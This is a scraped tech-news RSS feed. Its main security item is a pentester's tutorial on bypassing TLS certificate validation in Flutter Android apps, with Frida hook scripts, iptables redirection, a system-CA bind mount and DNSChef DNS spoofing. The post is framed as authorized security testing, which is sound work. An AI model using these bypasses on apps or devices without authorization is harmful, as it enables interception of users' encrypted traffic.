<pubDate>Thu, 25 Jun 2026 07:25:03 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Microsoft's latest Windows 11 Insider flight updates eight in-box apps, adding a continuous zoom slider and native QR scanning to Camera, AI watermarking controls in Photos, a counting-up timer in Clock, eraser transparency in Paint, and a faster Notepad with Find/Replace fixes.</p>
<p>The post <a rel="nofollow" href="https://www.windowslatest.com/2026/06/25/8-inbox-windows-11-apps-are-getting-a-major-update-heres-a-closer-look/">8 inbox Windows 11 apps are getting a major update, here’s a closer look</a> appeared first on <a rel="nofollow" href="https://www.windowslatest.com/">Windows Latest</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Transcript: Here’s what Bill Gates told lawmakers in his recent Epstein testimony]]></title>
<description><![CDATA[The U.S. House Oversight Committee on Tuesday released the transcript of a closed-door interview in which Microsoft co-founder Bill Gates answered lawmakers' questions, under oath, about his ties to the late convicted sex offender Jeffrey Epstein. Read More]]></description>
<link>https://tsecurity.de/de/3622635/it-nachrichten/transcript-heres-what-bill-gates-told-lawmakers-in-his-recent-epstein-testimony/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622635/it-nachrichten/transcript-heres-what-bill-gates-told-lawmakers-in-his-recent-epstein-testimony/</guid>
<pubDate>Wed, 24 Jun 2026 21:32:45 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1260" height="836" src="https://cdn.geekwire.com/wp-content/uploads/2020/02/bill-gates-aaas-5-1260x836.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://cdn.geekwire.com/wp-content/uploads/2020/02/bill-gates-aaas-5-1260x836.jpg 1260w, https://cdn.geekwire.com/wp-content/uploads/2020/02/bill-gates-aaas-5-768x510.jpg 768w, https://cdn.geekwire.com/wp-content/uploads/2020/02/bill-gates-aaas-5-1536x1019.jpg 1536w, https://cdn.geekwire.com/wp-content/uploads/2020/02/bill-gates-aaas-5-2048x1359.jpg 2048w, https://cdn.geekwire.com/wp-content/uploads/2020/02/bill-gates-aaas-5-630x418.jpg 630w" sizes="(max-width: 1260px) 100vw, 1260px"><br>The U.S. House Oversight Committee on Tuesday released the transcript of a closed-door interview in which Microsoft co-founder Bill Gates answered lawmakers' questions, under oath, about his ties to the late convicted sex offender Jeffrey Epstein. <a href="https://www.geekwire.com/2026/transcript-heres-what-bill-gates-told-lawmakers-in-his-recent-epstein-testimony/">Read More</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Here’s Galaxy Watch Ultra 2]]></title>
<description><![CDATA[After getting our first good look at Galaxy Watch 9 yesterday, we now get to see the upcoming Galaxy Watch Ultra 2. We fully expect this device to launch alongside Watch 9 and Samsung’s newest foldables at Unpacked in July. As you can likely immediately tell, there may not be too many major desig...]]></description>
<link>https://tsecurity.de/de/3622052/it-nachrichten/heres-galaxy-watch-ultra-2/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622052/it-nachrichten/heres-galaxy-watch-ultra-2/</guid>
<pubDate>Wed, 24 Jun 2026 18:03:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>After getting our first good look at Galaxy Watch 9 yesterday, we now get to see the upcoming Galaxy Watch Ultra 2. We fully expect this device to launch alongside Watch 9 and Samsung’s newest foldables at Unpacked in July. As you can likely immediately tell, there may not be too many major design changes,...</p>
<p>Read the original post: <a href="https://www.droid-life.com/2026/06/24/heres-galaxy-watch-ultra-2/">Here’s Galaxy Watch Ultra 2</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[‘Digit’ maker Agility Robotics to go public in $2.5B deal — here’s what the filings say about its finances]]></title>
<description><![CDATA[Salem, Ore.-based Agility Robotics, whose two-legged Digit robots have been tested inside Amazon warehouses, is set to become the first publicly traded U.S. company dedicated solely to humanoid robots, beating its Silicon Valley and East Coast rivals to Wall Street. Read More]]></description>
<link>https://tsecurity.de/de/3621871/it-nachrichten/digit-maker-agility-robotics-to-go-public-in-25b-deal-heres-what-the-filings-say-about-its-finances/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621871/it-nachrichten/digit-maker-agility-robotics-to-go-public-in-25b-deal-heres-what-the-filings-say-about-its-finances/</guid>
<pubDate>Wed, 24 Jun 2026 17:19:32 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1260" height="945" src="https://cdn.geekwire.com/wp-content/uploads/2026/06/Agility_Digit_06-1260x945.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://cdn.geekwire.com/wp-content/uploads/2026/06/Agility_Digit_06-1260x945.jpg 1260w, https://cdn.geekwire.com/wp-content/uploads/2026/06/Agility_Digit_06-768x576.jpg 768w, https://cdn.geekwire.com/wp-content/uploads/2026/06/Agility_Digit_06-1536x1152.jpg 1536w, https://cdn.geekwire.com/wp-content/uploads/2026/06/Agility_Digit_06.jpg 2000w" sizes="(max-width: 1260px) 100vw, 1260px"><br>Salem, Ore.-based Agility Robotics, whose two-legged Digit robots have been tested inside Amazon warehouses, is set to become the first publicly traded U.S. company dedicated solely to humanoid robots, beating its Silicon Valley and East Coast rivals to Wall Street. <a href="https://www.geekwire.com/2026/digit-maker-agility-robotics-to-go-public-in-2-5b-deal-heres-what-the-filings-say-about-its-finances/">Read More</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[I Wasted 3 Days Intercepting a Flutter App. Here’s What Actually Works.]]></title>
<description><![CDATA[Three days. That’s how long it took me to get Burp Suite seeing traffic from a Flutter app during a security assessment.I tried everything I knew. Objection. ReFlutter, which actually patches the Flutter binary itself. Custom CA installation. VPN-based interception. Standard Frida SSL bypass scri...]]></description>
<link>https://tsecurity.de/de/3621794/hacking/i-wasted-3-days-intercepting-a-flutter-app-heres-what-actually-works/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621794/hacking/i-wasted-3-days-intercepting-a-flutter-app-heres-what-actually-works/</guid>
<pubDate>Wed, 24 Jun 2026 16:55:14 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*K8PC8q14WKtGzOCpXufO_g.png"></figure><p>Three days. That’s how long it took me to get Burp Suite seeing traffic from a Flutter app during a security assessment.</p><p>I tried everything I knew. Objection. ReFlutter, which actually patches the Flutter binary itself. Custom CA installation. VPN-based interception. Standard Frida SSL bypass scripts from GitHub. Each one either failed silently or gave me the exact same result: app opens, appears to load, shows “no internet.” Not an SSL error. Not a certificate warning. Just “no internet,” like the proxy wasn’t even there.</p><p>At some point I stopped trying individual tools and started asking a different question: what is actually happening at each layer, and why is patching one thing not enough? That’s when things started making sense.</p><p>What eventually worked wasn’t a new tool or a clever trick. It was running all the right hooks at the same time, covering every SSL validation path the app could be using. I put those together into two scripts. That’s what this post is about.</p><h3>Why Flutter Makes This Harder Than It Should Be</h3><p>Most Android SSL bypass guides assume Java or Kotlin. Flutter is built differently.</p><p>Flutter ships its own TLS implementation, BoringSSL, compiled directly into libflutter.so. It has nothing to do with Android's certificate trust chain. Installing Burp's CA through Settings, the first thing every guide tells you to do, has zero effect on Flutter's networking. The app just doesn't use that trust store.</p><p>That’s the first problem. The second one is subtler. Even if you patch Flutter’s TLS correctly, some apps run a connectivity check through a Java or WebView layer before Flutter even initializes. That check goes through Android’s certificate chain, which on API 24 and above won’t trust user-installed CAs. So the Flutter bypass works, the Flutter layer is satisfied, and the app still shows “no internet” because the Java layer already rejected the connection a few milliseconds earlier.</p><p>This is exactly why ReFlutter wasn’t enough. It patches the Flutter binary, full stop. If anything is happening outside Flutter, in Java or WebView, ReFlutter never touches it.</p><p>Covering one layer doesn’t work. You have to cover all of them.</p><h3>The Scripts</h3><h3>Script 1: disable-flutter-tls-v1.js</h3><p>This one handles the Flutter TLS layer.</p><p>Flutter’s BoringSSL has a function called ssl_verify_peer_cert in handshake.cc that does the actual peer certificate verification. The script finds this function in memory using byte pattern matching. It has patterns for arm64, arm, x64, and x86 across both Android and iOS. Once it finds the function, it replaces the implementation with one that always returns 0, meaning every certificate passes without any check.</p><pre>function hook_ssl_verify_peer_cert(address) {<br>    Interceptor.replace(address, new NativeCallback((pathPtr, flags) =&gt; {<br>        return 0;<br>    }, 'int', ['pointer', 'int']));<br>}</pre><p>There’s a timing problem that causes silent failures on a lot of devices. Frida attaches to the process before libflutter.so finishes loading. Pattern matching runs, finds nothing, exits cleanly, and you see no error, but the bypass never actually happened. The script handles this by retrying up to five times with a one-second delay between attempts. Once the library is found, the retry counter resets so the pattern search also gets its full number of attempts.</p><h3>Script 2: universal_bypass.js</h3><p>This one covers everything in the Java layer, outside Flutter’s Dart runtime.</p><p><strong>X509TrustManager</strong> is Android’s standard interface for certificate validation. The script registers a custom implementation where checkClientTrusted, checkServerTrusted, and getAcceptedIssuers are all empty. No certificate chain ever gets checked.</p><pre>var TrustManager = Java.registerClass({<br>    name: 'com.burp.bypass.TrustManager',<br>    implements: [X509TrustManager],<br>    methods: {<br>        checkClientTrusted: function(chain, authType) {},<br>        checkServerTrusted: function(chain, authType) {},<br>        getAcceptedIssuers: function() { return []; }<br>    }<br>});</pre><p><strong>SSLContext.init()</strong> gets hooked so that every SSL context created anywhere in the app, including inside third-party libraries, gets the bypass trust manager injected into it at initialization time.</p><p><strong>HostnameVerifier</strong> is hooked to return true for every hostname. Some apps validate the server hostname as a completely separate step from certificate validation. Without this, you can pass the certificate check and still get blocked.</p><p><strong>WebViewClient.onReceivedSslError</strong> calls handler.proceed() instead of showing an error page. Without this, any WebView inside the app will just stop loading when Burp intercepts the connection.</p><p><strong>InAppWebViewClient</strong> is the hook that was missing from every existing script I found. Apps using the flutter_inappwebview plugin register their own WebView client subclass at com.pichillilorenzo.flutter_inappwebview_android.webview.in_app_webview.InAppWebViewClient. Hooking the parent WebViewClient class does nothing for this subclass. You have to hook it by its full name specifically.</p><pre>try {<br>    var InAppWebViewClient = Java.use('com.pichillilorenzo.flutter_inappwebview_android.webview.in_app_webview.InAppWebViewClient');<br>    InAppWebViewClient.onReceivedSslError.implementation = function(view, handler, error) {<br>        handler.proceed();<br>    };<br>} catch(e) {<br>    console.log("[-] InAppWebView not present: " + e);<br>}</pre><p>The try/catch exists because if the app doesn’t use flutter_inappwebview, that class simply doesn’t exist. A bare Java.use() call on a missing class crashes the entire script before any other hook runs. The catch keeps everything else alive.</p><h3>Running both scripts</h3><pre>frida -U -f com.your.app.package -l ./disable-flutter-tls-v1.js -l ./universal_bypass.js</pre><p>If the app freezes after launch, type %resume in the Frida REPL to unpause it. If you attached to an already running process, skip this — there's nothing to resume.</p><p>Watch the output. The Flutter script will log which byte pattern matched and at what address. The Java script logs each hook as it fires. Traffic should start showing up in Burp within a few seconds of the app making its first network request.</p><p>On most Flutter apps I’ve tested, this is enough. Try it before going any further.</p><h3>When the Scripts Are Not Enough</h3><p>A small number of apps ignore system routing or have extra checks at the network level. For those, you need the traffic path set up correctly underneath the scripts.</p><h3>Burp Invisible Proxy</h3><p>When iptables redirects traffic to Burp, the app sends raw TCP directly, no CONNECT handshake. Without invisible proxy mode, Burp doesn’t know how to handle this and logs “Client request violates HTTP protocol” while showing nothing in Intercept.</p><p>Go to Proxy, then Proxy Listeners, select your listener, click Edit, go to Request handling, and enable Support invisible proxying. Leave Redirect to host empty.</p><p>Also worth checking: make sure Burp is actually binding to all interfaces.</p><pre>netstat -an | grep 8080<br># 0.0.0.0:8080 is correct. 127.0.0.1:8080 means the emulator can't reach it.</pre><h3>iptables Traffic Redirection</h3><p>Flutter apps make direct TCP connections and ignore Android’s proxy settings entirely. iptables handles the redirect at the kernel level, rewriting the destination address before the packet leaves the device.</p><pre>adb reverse --remove-all<br>adb shell su -c 'iptables -t nat -F'</pre><pre>adb shell su -c 'iptables -t nat -A OUTPUT -p tcp --dport 443 -j DNAT --to-destination 10.0.2.2:8080'<br>adb shell su -c 'iptables -t nat -A OUTPUT -p tcp --dport 80 -j DNAT --to-destination 10.0.2.2:8080'</pre><pre>adb shell su -c 'iptables -t nat -L -n -v'</pre><p>Always flush before adding rules. Duplicate DNAT entries stack silently and the routing behavior they produce is not obvious.</p><h3>Burp’s CA as a System Certificate</h3><p>If there’s Java-level certificate validation that Frida doesn’t catch in time, Burp’s CA needs to be in the system store. User-installed certificates are ignored on API 24 and above. The bind mount approach gets around the read-only partition:</p><pre>openssl x509 -inform DER -in cacert.der -out cacert.pem<br>openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1<br># e.g. 9a5ba575, so the file must be named 9a5ba575.0</pre><pre>adb shell su -c 'cp -a /system/etc/security/cacerts /data/local/tmp/system_cacerts'<br>adb push cacert.pem /data/local/tmp/system_cacerts/<br>adb shell su -c 'mv /data/local/tmp/system_cacerts/cacert.pem /data/local/tmp/system_cacerts/9a5ba575.0'<br>adb shell su -c 'chmod 644 /data/local/tmp/system_cacerts/9a5ba575.0'<br>adb shell su -c 'mount -o bind /data/local/tmp/system_cacerts /system/etc/security/cacerts'</pre><h3>DNSChef: When iptables Still Isn’t Enough</h3><p>On a handful of apps, even the full iptables setup wasn’t getting traffic into Burp. The tell was tcpdump: packets were leaving the device on port 443 going somewhere other than Burp. The app was doing something at the network level that DNAT wasn’t catching.</p><p><a href="https://github.com/iphelix/dnschef">DNSChef</a> takes a completely different approach. Instead of redirecting traffic after DNS resolution happens, you intercept the DNS resolution itself. Point the device’s DNS server at your machine, run DNSChef to answer every query with your IP, and the app’s traffic arrives at Burp before iptables even has to act.</p><pre>adb shell settings put global dns1 &lt;your-machine-ip&gt;<br>adb shell settings put global dns2 &lt;your-machine-ip&gt;</pre><pre>sudo python dnschef.py --fakeip &lt;your-machine-ip&gt; --interface &lt;your-machine-ip&gt;</pre><p>Then run the Frida scripts on top:</p><pre>frida -U -f com.your.app.package -l ./disable-flutter-tls-v1.js -l ./universal_bypass.js</pre><p>If the app freezes, type %resume in the REPL. Skip it if you attached to a running process.</p><p>With everything running, the app resolves its backend domain and gets your machine’s IP back. It sends HTTPS there. Burp picks it up in invisible proxy mode. Frida has already patched TLS validation so the app accepts Burp’s certificate. The app has no visibility into any of it.</p><p>I’ve needed this combination maybe twice. Both times tcpdump was what showed me why iptables alone wasn’t doing it.</p><h3>If Things Still Aren’t Working</h3><p>Check the Burp Event Log before assuming the scripts failed. “Failed to negotiate TLS connection” means the CA isn’t trusted, so run the scripts or use the bind mount. “Client request violates HTTP protocol” means invisible proxy isn’t on. If the Event Log shows nothing at all, traffic isn’t reaching Burp, and tcpdump will tell you where it’s actually going.</p><pre>adb shell su -c 'tcpdump -i any -n port 443'</pre><h3>To Wrap Up</h3><p>The two scripts cover the vast majority of Flutter apps on their own. The InAppWebViewClient hook is the part that was missing from everything else I found. If you’ve tried other bypass scripts and WebView traffic is still getting blocked, that subclass hook is probably why they didn’t work.</p><p>The rest of this post, iptables, bind mount, DNSChef, exists for edge cases. I needed those setups occasionally. You might not need them at all.</p><p>I spent three days on this. Hopefully you won’t have to.</p><h3>Credits and Prior Work</h3><p>These scripts are a compilation. The Flutter TLS patch comes from NVISOsecurity’s disable-flutter-tls-verification project. The Java-layer hooks — X509TrustManager, SSLContext, HostnameVerifier, WebViewClient — are standard Frida patterns that have been around for years and exist in various forms across dozens of public scripts. The InAppWebViewClient hook is the one addition I put together after hitting that specific problem myself and not finding it handled anywhere else.</p><p>I collected what was scattered, tested what actually worked, and put it in two files. That’s it.</p><p><em>Scripts: </em><a href="https://github.com/Ar-baaz/Universal-SSL-Bypass-Script-for-Flutter-Apps"><em>github.com/Ar-baaz/Universal-SSL-Bypass-Script-for-Flutter-Apps</em></a></p><p><em>DNSChef: </em><a href="https://github.com/iphelix/dnschef"><em>github.com/iphelix/dnschef</em></a></p><p><em>For authorized security testing or your own apps only.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=d3e9a4816818" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/i-wasted-3-days-intercepting-a-flutter-app-heres-what-actually-works-d3e9a4816818">I Wasted 3 Days Intercepting a Flutter App. Here’s What Actually Works.</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Using Visual Studio Code’s ‘air-gapped’ AI model mode]]></title>
<description><![CDATA[Microsoft has been pushing hard to make Visual Studio Code a major way to consume its AI services, mostly in the form of GitHub Copilot. GitHub Copilot’s deep integration with VS Code brings many conveniences — inline autocomplete, for instance — but it’s frustrating for those, like me, who would...]]></description>
<link>https://tsecurity.de/de/3620721/ai-nachrichten/using-visual-studio-codes-air-gapped-ai-model-mode/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3620721/ai-nachrichten/using-visual-studio-codes-air-gapped-ai-model-mode/</guid>
<pubDate>Wed, 24 Jun 2026 11:03:55 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Microsoft has been pushing hard to make <a href="https://www.infoworld.com/article/2335960/what-is-visual-studio-code-microsofts-extensible-code-editor.html" data-type="link" data-id="https://www.infoworld.com/article/2335960/what-is-visual-studio-code-microsofts-extensible-code-editor.html">Visual Studio Code</a> a major way to consume its AI services, mostly in the form of <a href="https://www.infoworld.com/article/3609013/github-copilot-everything-you-need-to-know.html" data-type="link" data-id="https://www.infoworld.com/article/3609013/github-copilot-everything-you-need-to-know.html">GitHub Copilot</a>. GitHub Copilot’s deep integration with VS Code brings many conveniences — inline autocomplete, for instance — but it’s frustrating for those, like me, who would rather use another model provider, or even a locally hosted LLM, for those functions.</p>



<p>Visual Studio Code 1.122 introduced a new feature, “<a href="https://code.visualstudio.com/updates/v1_122#_use-byok-without-a-github-sign-in">Use BYOK [Bring Your Own Key] without a GitHub sign-in</a>,” that allows you to “use chat, tools, and MCP servers in air-gapped or restricted environments where GitHub sign-in isn’t possible.” More importantly, it “enables fully offline workflows with local models like Ollama.”</p>



<p>In other words, you can now use locally hosted LLMs for chat, tools, and <a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html" data-type="link" data-id="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">Model Context Protocol</a> servers inside Visual Studio Code. The one thing you still can’t do is use a local LLM for inline and next-edit suggestions — at least, not without additional tooling.</p>



<h2 class="wp-block-heading">Choosing a model for BYOK mode</h2>



<p>If you want to use a local LLM with VS Code’s bring-your-own-model system, the first thing you need is a way to host the model. VS Code lacks a model-hosting mechanism of its own, although it’s conceivable that a VS Code extension may offer something like that in the future. That said, hosting models is complicated enough that a dedicated app is really needed for the job.</p>



<p>One easy way to host models is via a product like <a href="https://www.infoworld.com/article/4127250/first-look-run-llms-locally-with-lm-studio.html">LM Studio</a>, a convenient GUI for standing up, serving, and managing LLMs on one’s own hardware. The model host does not have to be the same system you run VS Code on, either. It can be on a server box you control, or on a cloud instance.</p>



<p>The choice of model is also important. Many models are powerful but won’t run well on commodity hardware because they’re simply too big. A good rule of thumb is to choose a model that fits into existing VRAM, along with the memory needed for a sizable token context (the more, the better). Also, the model should be suited to coding and development work. Some models in this vein that fit comfortably into 8GB VRAM include:</p>



<ul class="wp-block-list">
<li><a href="https://lmstudio.ai/models/google/gemma-4-e2b">Gemma4 (effective 2 billion parameters version)</a></li>



<li><a href="https://lmstudio.ai/models/qwen/qwen3.5-9b">Qwen3.5 9B</a></li>



<li><a href="https://huggingface.co/bartowski/Codestral-22B-v0.1-GGUF">Codestral 22B v.0.1</a> (<a href="https://mistral.ai/licenses/MNPL-0.1.md">proprietary license</a>)</li>
</ul>



<h2 class="wp-block-heading">Setting up BYOK mode in VS Code</h2>



<p>Once you have a model up and running, you can integrate it with Visual Studio Code. If you’ve disabled VS Code’s AI features, you will need to turn them on. Make sure the setting <code>chat.disableAIFeatures</code> is turned off. You can find it in <code>Settings | Chat | Miscellaneous</code>.</p>



<p>Third-party language models are managed through Visual Studio Code’s language model list. Press <code>Ctrl-Shift-P</code> and type <code>Manage Language Models</code> to open the list of existing language models.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/image_154.png?w=1024" alt="Managing VS Code's AI language model list" class="wp-image-4186819" width="1024" height="406" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Managing VS Code’s AI language model list. The models available by default are only models available as external APIs, not models that run locally.</p></figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>First you will see a list of the built-in models, which are all externally hosted. To add a new model, select <code>Add Models</code> at the top right and select <code>Custom Endpoint</code>.</p>



<p>You’ll then get a series of prompts:</p>



<ul class="wp-block-list">
<li><strong>Group Name</strong>: This is “Custom Endpoint” by default, but you can choose any name you want. The name is strictly for organizing the model list and doesn’t affect things like model recognition or connectivity.</li>



<li><strong>API Key</strong>: If you’ve configured LM Studio to use an API key for serving models, provide it here. If you’re hosting the model locally and you haven’t explicitly set up API keys, you can leave this blank.</li>



<li><strong>API Type</strong>: The options here are <code>Chat Completions</code>, <code>Responses</code>, and <code>Messages</code>. Most of the time you’ll want to use <code>Responses</code>, as it’s the most general-purpose option of the three.</li>
</ul>



<p>Once you finish providing those answers, you’ll be dropped into a modal editor for a JSON file that holds the details about the endpoint you’re configuring.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/image_155.png" alt="A newly created custom endpoint for a locally hosted model" class="wp-image-4186820" width="1006" height="569" sizes="auto, (max-width: 1006px) 100vw, 1006px"><figcaption class="wp-element-caption"><p>A newly created custom endpoint for a locally hosted model. The ID, name, and URL still need to be defined for this model to be useful.</p></figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>You’ll need to provide a few more details by typing them into the labeled fields:</p>



<ul class="wp-block-list">
<li><code>id</code>: A text field that uniquely identifies this particular entry. The choice of ID is pretty much arbitrary; if you’re using only a single model, the ID could be the model name.</li>



<li><code>name</code>: The name of the model that is used to identify it on the model server. In LM Studio, you can get this name by clicking on <code>My Models</code> in the main interface, then selecting the three-dot icon for the model in question and clicking <code>Copy Default Identifier</code>. For Qwen 2.5, for instance, <code>name</code> might be something like <code>qwen2.5-coder-7b-instruct</code>.</li>



<li><code>url</code>: The URL to the server’s endpoint. On LM Studio, this defaults to something like <code>http://127.0.0.1:1234/v1</code>. The <code>/v1</code> at the end is important because that endpoint is used for autodiscovery of models and their capabilities.</li>
</ul>



<p>The other fields generally don’t need editing. Most models have tool calling functionality. If you know for a fact that the model you’re using doesn’t have vision support, then set <code>vision</code> to <code>false</code>.</p>



<p>Once you have these fields filled in, you can close the modal editor to save the changes. If you reload the <code>Manage Language Models</code> page, you’ll now see your new endpoint:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/image_399.png" alt="A newly created local endpoint" class="wp-image-4186833" width="830" height="564" sizes="auto, (max-width: 830px) 100vw, 830px"><figcaption class="wp-element-caption"><p>A newly created local endpoint. The choice of name and group is arbitrary. “Custom Endpoint” is the default name for a newly created group of endpoints.</p></figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>You should now be able to launch the chat window and use the defined model for conversation and utilities:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/image_400.png?w=1024" alt="Conversing with the local model using VS Code's chat window" class="wp-image-4186837" width="1024" height="719" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Conversing with the local model using VS Code’s chat window. Note the selected code block in the left pane that is being used as the context for the conversation.</p></figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>One current, and major, limitation of Visual Studio Code’s BYOK functionality is that it only works for chat and utility tasks. It doesn’t allow you to use a local model for inline suggestions or code completions. The only way to <a href="https://www.infoworld.com/article/4144487/i-ran-qwen3-5-locally-instead-of-claude-code-heres-what-happened.html">take advantage of local models for expanded functionality with VS Code</a> is to use a third-party tool like <a href="https://marketplace.visualstudio.com/items?itemName=Continue.continue">Continue</a>.</p>



<p>It isn’t clear if Microsoft will eventually lift this restriction. GitHub Copilot integration in VS Code is a large part of how Copilot as a service reaches its target audience. For the time being, you can certainly use third-party and local models for a significant part of your AI-assisted development work in VS Code, and you can close the functionality gap with additional tooling. </p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Here’s the Galaxy Watch 9]]></title>
<description><![CDATA[We are nearing Samsung’s next Unpacked event, presumably where the company will showcase its latest foldable devices, as well as new Galaxy watches. As of today, we anticipate two watches: Galaxy Watch 9 in two sizes, plus the Galaxy Watch Ultra 2. No Galaxy Watch 9 Classic is currently expected....]]></description>
<link>https://tsecurity.de/de/3619405/it-nachrichten/heres-the-galaxy-watch-9/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3619405/it-nachrichten/heres-the-galaxy-watch-9/</guid>
<pubDate>Tue, 23 Jun 2026 21:18:15 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>We are nearing Samsung’s next Unpacked event, presumably where the company will showcase its latest foldable devices, as well as new Galaxy watches. As of today, we anticipate two watches: Galaxy Watch 9 in two sizes, plus the Galaxy Watch Ultra 2. No Galaxy Watch 9 Classic is currently expected. Thanks to Android Headlines in...</p>
<p>Read the original post: <a href="https://www.droid-life.com/2026/06/23/heres-the-galaxy-watch-9/">Here’s the Galaxy Watch 9</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw VPS Is Becoming a Hosting Category. Here’s How to Offer It Securely]]></title>
<description><![CDATA[AI agents like OpenClaw have moved from demos to daily work. Developers now run them on servers to write code, manage files, call APIs, and automate operations. That activity has to live somewhere, and increasingly it lives on a VPS. A new product line is forming in front of the hosting industry:...]]></description>
<link>https://tsecurity.de/de/3615362/unix-server/openclaw-vps-is-becoming-a-hosting-category-heres-how-to-offer-it-securely/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615362/unix-server/openclaw-vps-is-becoming-a-hosting-category-heres-how-to-offer-it-securely/</guid>
<pubDate>Mon, 22 Jun 2026 14:01:25 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="hs-featured-image-wrapper"> 
 <a href="https://blog.cloudlinux.com/openclaw-vps-is-becoming-a-hosting-category.-heres-how-to-offer-it-securely-1" title="" class="hs-featured-image-link"> <img src="https://blog.cloudlinux.com/hubfs/ImunifyforAIAgents-Blog.png" alt="OpenClaw VPS Is Becoming a Hosting Category. Here’s How to Offer It Securely" class="hs-featured-image"> </a> 
</div> 
<p><br>AI agents like OpenClaw have moved from demos to daily work. Developers now run them on servers to write code, manage files, call APIs, and automate operations. That activity has to live somewhere, and increasingly it lives on a VPS. A new product line is forming in front of the hosting industry: the AI-agent VPS.<br><br>The timing lines up with where providers already see growth. In the<a href="https://cloudlinux.com/resources/web-hosting-trends-report-2026/download-full-report"><em><u><span>2026 Web Hosting Trends Report</span></u></em></a>, VPS and dedicated hosting was the single biggest named growth opportunity for the next two to three years (26%), ahead of shared hosting (22%) and cloud servers (17%). The same providers rated AI as the trend most likely to shape 2026. AI-agent VPS sits exactly where those two priorities meet.<br><br>The opportunity is real, as is the risk. Let’s look at both, and at how a hosting provider can launch a protected AI-agent VPS without building agent security in-house.<br><br>If you already offer OpenClaw VPS, run preinstalled OpenClaw, or are planning a managed OpenClaw plan, this is written for you.<br><br></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI is transforming enterprise data risk. Here’s how security leaders are responding.]]></title>
<description><![CDATA[New research from 1,700 security leaders reveals 3 imperatives for securing AI adoption. This article has been indexed from Cybersecurity Dive – Latest News Read the original article: AI is transforming enterprise data risk. Here’s how security leaders are responding.
Read more →
The post AI is t...]]></description>
<link>https://tsecurity.de/de/3615013/it-security-nachrichten/ai-is-transforming-enterprise-data-risk-heres-how-security-leaders-are-responding/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615013/it-security-nachrichten/ai-is-transforming-enterprise-data-risk-heres-how-security-leaders-are-responding/</guid>
<pubDate>Mon, 22 Jun 2026 11:38:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>New research from 1,700 security leaders reveals 3 imperatives for securing AI adoption. This article has been indexed from Cybersecurity Dive – Latest News Read the original article: AI is transforming enterprise data risk. Here’s how security leaders are responding.</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/ai-is-transforming-enterprise-data-risk-heres-how-security-leaders-are-responding/">Read more →</a></p>
